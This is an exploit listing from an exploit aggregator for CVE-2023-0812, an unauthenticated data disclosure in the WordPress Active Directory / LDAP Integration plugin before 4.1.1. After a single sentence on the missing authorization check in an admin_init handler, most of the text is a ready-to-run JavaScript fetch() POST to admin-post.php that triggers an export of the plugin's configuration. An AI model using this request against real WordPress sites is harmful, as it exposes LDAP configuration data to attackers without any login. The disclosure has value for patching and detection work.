Exploit for Active Directory Integration / LDAP Integration < 4.1.1 - Unauthenticated Data Disclosure CVE-2023-0812

Name: Exploit for Active Directory Integration / LDAP Integration < 4.1.1 - Unauthenticated Data Disclosure CVE-2023-0812
Rating: 5 (43 reviews)

2023-04-19 | CVSS 5.0

## https://sploitus.com/exploit?id=WPEX-ID:0ED5E1B3-F2A3-4EB1-B8AE-D3A62F600107
The `admin_init` hook calls MoLdapLocalLogin class login_widget_save_options() method where there are some post request handlers without authorization.

Exploit:

fetch('/wp-admin/admin-post.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'option=mo_ldap_login_send_query&export_configuration_choice=yes&inner_form_email_id=admin@localhost.org&inner_form_query_id=test',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));